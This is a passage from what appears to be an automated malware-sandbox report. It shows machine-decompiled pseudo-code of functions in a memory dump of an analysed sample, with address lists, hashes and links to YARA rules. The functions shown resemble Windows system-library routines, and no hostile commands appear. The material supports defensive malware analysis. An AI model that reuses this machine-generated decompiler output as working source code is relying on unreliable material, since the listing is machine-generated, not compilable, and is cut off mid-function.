												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x18ab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x18a84c0;
																			if(_t82 >=  *0x18a84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01889063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E017B922A(_t99);
										_t64 = E017D7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01888B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x18a86c0; // 0x12807b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x18a86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x18a86bc;
													_t87 = 0x18a86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E017B9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x18a86c4;
												_t87 = 0x18a86c0;
												L27:
												E017E9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0180D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x18a5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x18a538c = _t51;
						goto L6;
					}
				}
			}




















                                                    0x017b9082
                                                    0x017b9083
                                                    0x017b9084
                                                    0x017b9085
                                                    0x017b9087
                                                    0x017b9096
                                                    0x017b9098
                                                    0x017b9098
                                                    0x017b909e
                                                    0x017b90a8
                                                    0x017b90e7
                                                    0x017b90e7
                                                    0x017b90aa
                                                    0x017b90b0
                                                    0x017b90b7
                                                    0x017b90bd
                                                    0x017b90dd
                                                    0x017b90e6
                                                    0x017b90bf
                                                    0x017b90bf
                                                    0x017b90c7
                                                    0x017b90cf
                                                    0x017b90f1
                                                    0x017b90f2
                                                    0x017b90f4
                                                    0x017b90f5
                                                    0x017b90f6
                                                    0x017b90f7
                                                    0x017b90f8
                                                    0x017b90f9
                                                    0x017b90fa
                                                    0x017b90fb
                                                    0x017b90fc
                                                    0x017b90fd
                                                    0x017b90fe
                                                    0x017b90ff
                                                    0x017b9100
                                                    0x017b9102
                                                    0x017b9107
                                                    0x017b910c
                                                    0x017b9110
                                                    0x017b9113
                                                    0x017b9115
                                                    0x017b9136
                                                    0x017b913f
                                                    0x017b9143
                                                    0x018137e4
                                                    0x018137e4
                                                    0x017b9117
                                                    0x017b9117
                                                    0x017b911d
                                                    0x00000000
                                                    0x017b911f
                                                    0x017b911f
                                                    0x017b9125
                                                    0x00000000
                                                    0x017b9127
                                                    0x017b912d
                                                    0x017b9130
                                                    0x017b9134
                                                    0x017b9158
                                                    0x017b915d
                                                    0x017b9161
                                                    0x017b9168
                                                    0x01813715
                                                    0x017b916e
                                                    0x017b916e
                                                    0x017b9175
                                                    0x017b9177
                                                    0x017b917e
                                                    0x017b917f
                                                    0x017b9182
                                                    0x017b9182
                                                    0x017b9187
                                                    0x017b9187
                                                    0x017b918a
                                                    0x017b918d
                                                    0x017b918f
                                                    0x017b9192
                                                    0x017b9195
                                                    0x017b9198
                                                    0x017b9198
                                                    0x017b9198
                                                    0x017b919a
                                                    0x00000000
                                                    0x00000000
                                                    0x0181371f
                                                    0x01813721
                                                    0x01813727
                                                    0x0181372f
                                                    0x01813733
                                                    0x01813735
                                                    0x01813738
                                                    0x0181373b
                                                    0x0181373d
                                                    0x01813740
                                                    0x00000000
                                                    0x01813746
                                                    0x01813746
                                                    0x01813749
                                                    0x00000000
                                                    0x0181374f
                                                    0x0181374f
                                                    0x01813751
                                                    0x01813757
                                                    0x01813759
                                                    0x0181375c
                                                    0x0181375c
                                                    0x0181375e
                                                    0x0181375e
                                                    0x01813761
                                                    0x01813764
                                                    0x00000000
                                                    0x00000000
                                                    0x01813766
                                                    0x01813768
                                                    0x018137a3
                                                    0x018137a3
                                                    0x018137a5
                                                    0x018137a7
                                                    0x018137ad
                                                    0x018137b0
                                                    0x018137b2
                                                    0x018137bc
                                                    0x018137c2
                                                    0x018137c2
                                                    0x018137b2
                                                    0x017b9187
                                                    0x017b9187
                                                    0x017b918a
                                                    0x017b918d
                                                    0x017b918f
                                                    0x017b9192
                                                    0x017b9195
                                                    0x00000000
                                                    0x017b9195
                                                    0x00000000
                                                    0x0181376a
                                                    0x0181376a
                                                    0x0181376a
                                                    0x0181376c
                                                    0x0181376c
                                                    0x0181376f
                                                    0x01813775
                                                    0x00000000
                                                    0x00000000
                                                    0x01813777
                                                    0x01813779
                                                    0x01813782
                                                    0x01813787
                                                    0x01813789
                                                    0x01813790
                                                    0x01813790
                                                    0x0181378b
                                                    0x0181378b
                                                    0x0181378b
                                                    0x01813792
                                                    0x01813795
                                                    0x00000000
                                                    0x01813795
                                                    0x00000000
                                                    0x01813779
                                                    0x01813798
                                                    0x00000000
                                                    0x01813798
                                                    0x00000000
                                                    0x01813768
                                                    0x0181379b
                                                    0x0181379b
                                                    0x01813751
                                                    0x01813749
                                                    0x00000000
                                                    0x01813740
                                                    0x017b91a0
                                                    0x017b91a3
                                                    0x017b91a9
                                                    0x017b91b0
                                                    0x00000000
                                                    0x017b91b0
                                                    0x017b9187
                                                    0x017b91b4
                                                    0x017b91b4
                                                    0x017b91bb
                                                    0x017b91c0
                                                    0x017b91c5
                                                    0x017b91c7
                                                    0x018137da
                                                    0x017b91cd
                                                    0x017b91cd
                                                    0x017b91cd
                                                    0x017b91d2
                                                    0x017b91d5
                                                    0x017b9239
                                                    0x017b9239
                                                    0x017b91d7
                                                    0x017b91db
                                                    0x017b91e1
                                                    0x017b91e7
                                                    0x017b91fd
                                                    0x017b9203
                                                    0x017b921e
                                                    0x017b9223
                                                    0x00000000
                                                    0x017b9205
                                                    0x017b9205
                                                    0x017b9208
                                                    0x017b920c
                                                    0x017b9214
                                                    0x017b9214
                                                    0x017b920c
                                                    0x017b91e9
                                                    0x017b91e9
                                                    0x017b91ee
                                                    0x017b91f3
                                                    0x017b91f3
                                                    0x017b91f3
                                                    0x017b91e7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017b9134
                                                    0x017b9125
                                                    0x017b911d
                                                    0x017b914e
                                                    0x017b90d1
                                                    0x017b90d1
                                                    0x017b90d3
                                                    0x017b90d6
                                                    0x017b90d8
                                                    0x00000000
                                                    0x017b90d8
                                                    0x017b90cf

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7aec06c24fed6bacb1391bfc6ecbe418d80da828aae1638d3861c9aa1f59682
                                                    • Instruction ID: 9b241a3409238ef811bd2baec05bf3c17ddb17edd3da10dac942b58637a0794f
                                                    • Opcode Fuzzy Hash: e7aec06c24fed6bacb1391bfc6ecbe418d80da828aae1638d3861c9aa1f59682
                                                    • Instruction Fuzzy Hash: A401F4B29016068FD3258F08D880B11FBB9EF82324F214066E711CB696C370DD81CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0184C450 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E0184C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E017F9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E017F95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E017F95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E017F95D0();
				return L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                    0x0184c458
                                                    0x0184c45d
                                                    0x0184c466
                                                    0x0184c468
                                                    0x0184c469
                                                    0x0184c46a
                                                    0x0184c46b
                                                    0x0184c46e
                                                    0x0184c46f
                                                    0x0184c471
                                                    0x0184c476
                                                    0x0184c476
                                                    0x0184c47c
                                                    0x0184c47e
                                                    0x0184c480
                                                    0x0184c480
                                                    0x0184c483
                                                    0x0184c484
                                                    0x0184c486
                                                    0x0184c488
                                                    0x0184c48f
                                                    0x0184c491
                                                    0x0184c493
                                                    0x0184c493
                                                    0x0184c48f
                                                    0x0184c498
                                                    0x0184c49e
                                                    0x0184c4ad
                                                    0x0184c4ad
                                                    0x0184c4b2
                                                    0x0184c4b4
                                                    0x0184c4cd

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction ID: 8ec2fac1dbdb755e5fc73d75c68492fd6cb3327d0b6542c90fb5dd188890a945
                                                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction Fuzzy Hash: 3B01967114150ABFE715AF69CD84E63FB7DFF64364F114529F314936A4CB21ACA0CAA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01884015 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E01884015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E017D2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E017D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18a86ac);
					E017BF900(0x18a86d4, _t28);
					E017CFFB0(0x18a86ac, _t28, 0x18a86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E017CFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                    0x0188401a
                                                    0x0188401e
                                                    0x01884023
                                                    0x01884028
                                                    0x01884029
                                                    0x0188402b
                                                    0x0188402f
                                                    0x01884043
                                                    0x01884046
                                                    0x01884051
                                                    0x01884057
                                                    0x0188405f
                                                    0x01884062
                                                    0x01884067
                                                    0x0188406f
                                                    0x0188407c
                                                    0x0188407c
                                                    0x0188408c
                                                    0x0188408c
                                                    0x01884097

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07ba1a837e5a0684b3e0f7e3b5e54bba975a636b5817dad451c1d6608cf9e0bc
                                                    • Instruction ID: 4387b71fea239086f92a8d18e28f9a2ecd3446a00f5c9e10a97f3b51dc9dd586
                                                    • Opcode Fuzzy Hash: 07ba1a837e5a0684b3e0f7e3b5e54bba975a636b5817dad451c1d6608cf9e0bc
                                                    • Instruction Fuzzy Hash: 6F018F7220194A7FE251AB79CD88E13F7ACFF55B60B010229F508C3A11CB24ED12CAE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0187138A Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E0187138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x18ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E017FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E017D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                    0x0187138a
                                                    0x0187138a
                                                    0x01871399
                                                    0x018713a3
                                                    0x018713a8
                                                    0x018713aa
                                                    0x018713b5
                                                    0x018713bb
                                                    0x018713c3
                                                    0x018713c6
                                                    0x018713c9
                                                    0x018713d4
                                                    0x018713e6
                                                    0x018713d6
                                                    0x018713df
                                                    0x018713df
                                                    0x018713f1
                                                    0x018713f2
                                                    0x018713f4
                                                    0x018713f9
                                                    0x0187140e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4993accd50322043bbf4d374a255a942bad0946b81490c8b372aaa3d2e08793c
                                                    • Instruction ID: 58fa962c4e1694736077d081fe0fe32ba2c13a2c29d4b5875127c1b8be244a2d
                                                    • Opcode Fuzzy Hash: 4993accd50322043bbf4d374a255a942bad0946b81490c8b372aaa3d2e08793c
                                                    • Instruction Fuzzy Hash: 2A018071A00208ABDB14DFA9D845AAFBBB8EF44700F40405AB900EB380DA74DB04CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018714FB Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E018714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x18ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E017FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E017D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                    0x018714fb
                                                    0x018714fb
                                                    0x0187150a
                                                    0x01871514
                                                    0x01871519
                                                    0x0187151b
                                                    0x01871526
                                                    0x0187152c
                                                    0x01871534
                                                    0x01871537
                                                    0x0187153a
                                                    0x01871545
                                                    0x01871557
                                                    0x01871547
                                                    0x01871550
                                                    0x01871550
                                                    0x01871562
                                                    0x01871563
                                                    0x01871565
                                                    0x0187156a
                                                    0x0187157f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f39888ede51370ae1bc6134a9b480c1dae069b352baab911faa5659af456194
                                                    • Instruction ID: 336bb3c6eb10eeb85974543a6230655fd8561336f01389d2112119f39ca56e47
                                                    • Opcode Fuzzy Hash: 7f39888ede51370ae1bc6134a9b480c1dae069b352baab911faa5659af456194
                                                    • Instruction Fuzzy Hash: 2B018071A00248ABDB14DFA9D845EAFBBB8EF45700F40405AFA04EB380DA70DB00CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B58EC Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E017B58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x18ad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1795c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E017B5943() != 0 &&  *0x18a5320 > 5) {
					E01837B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01837B5E( &_v28, _t28);
					_t11 = E01837B9C(0x18a5320, 0x179bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E017FB640(_t11, _t17, _v8 ^ _t29, 0x179bf15, _t27, _t28);
			}















                                                    0x017b58fb
                                                    0x017b58fe
                                                    0x017b5906
                                                    0x017b590a
                                                    0x017b593c
                                                    0x017b593c
                                                    0x017b590c
                                                    0x017b590c
                                                    0x017b5911
                                                    0x00000000
                                                    0x017b5913
                                                    0x017b5913
                                                    0x017b5913
                                                    0x017b5911
                                                    0x017b591d
                                                    0x01811035
                                                    0x0181103c
                                                    0x0181103f
                                                    0x01811056
                                                    0x01811056
                                                    0x017b593b

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a7e2ef5689f11387a30fe0258d2aa4025058c255a708f0949294a1d2171e61b
                                                    • Instruction ID: 8fcd9507ceab04b622aef8e10ad4e32a0fc06e7108ba7f242165cc918b22d5b5
                                                    • Opcode Fuzzy Hash: 8a7e2ef5689f11387a30fe0258d2aa4025058c255a708f0949294a1d2171e61b
                                                    • Instruction Fuzzy Hash: 1B01F271A001059BDB14EB29D844AEFF7B8EF82230F8900A99A05D7244EF30DE06C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017CB02A Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017CB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E017D7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01837016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                    0x017cb037
                                                    0x017cb039
                                                    0x017cb03b
                                                    0x017cb040
                                                    0x0181a60e
                                                    0x00000000
                                                    0x00000000
                                                    0x0181a61d
                                                    0x017cb04b
                                                    0x017cb04e
                                                    0x0181a627
                                                    0x0181a634
                                                    0x00000000
                                                    0x00000000
                                                    0x0181a641
                                                    0x0181a653
                                                    0x0181a643
                                                    0x0181a64c
                                                    0x0181a64c
                                                    0x0181a65b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0181a66c
                                                    0x017cb057
                                                    0x017cb057
                                                    0x017cb057
                                                    0x017cb046
                                                    0x017cb046
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction ID: 4ef4eef5b70eeba82051adaf1abf3387f4b588b9599ccc05b98a1a47aad14d79
                                                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction Fuzzy Hash: 0E01D4322019C4DFE326871CC988F66BBDCEB81B80F0904A9FA19CB655D728DD80C624
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01881074 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E01881074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0188165E(__ebx, 0x18a8ae4, (__edx -  *0x18a8b04 >> 0x14) + (__edx -  *0x18a8b04 >> 0x14), __edi, __ecx, (__edx -  *0x18a8b04 >> 0x14) + (__edx -  *0x18a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0187AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E017D7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0186FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                    0x01881074
                                                    0x01881080
                                                    0x01881082
                                                    0x0188108a
                                                    0x0188108f
                                                    0x01881093
                                                    0x018810ab
                                                    0x018810ab
                                                    0x018810c3
                                                    0x018810cf
                                                    0x018810e1
                                                    0x018810d1
                                                    0x018810da
                                                    0x018810da
                                                    0x018810e9
                                                    0x018810f5
                                                    0x018810f5
                                                    0x018810fe

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c001467da36f248b2fb077316cdffc551542e3a45f49f5947eead00313df617f
                                                    • Instruction ID: 469be1bbabe289cc359227b5f5412fea67f591fdf6ad5196d467026fad0a7229
                                                    • Opcode Fuzzy Hash: c001467da36f248b2fb077316cdffc551542e3a45f49f5947eead00313df617f
                                                    • Instruction Fuzzy Hash: FE014C726047469FD714EF2CCC08B1A7BE5BB84314F048529F985D3290EE34D642CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0186FEC0 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E0186FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x18ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E017FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E017D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x0186fec0
                                                    0x0186fec0
                                                    0x0186fecf
                                                    0x0186fed9
                                                    0x0186fede
                                                    0x0186fee0
                                                    0x0186feeb
                                                    0x0186fef3
                                                    0x0186fef6
                                                    0x0186fef9
                                                    0x0186ff04
                                                    0x0186ff16
                                                    0x0186ff06
                                                    0x0186ff0f
                                                    0x0186ff0f
                                                    0x0186ff21
                                                    0x0186ff22
                                                    0x0186ff24
                                                    0x0186ff29
                                                    0x0186ff3e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
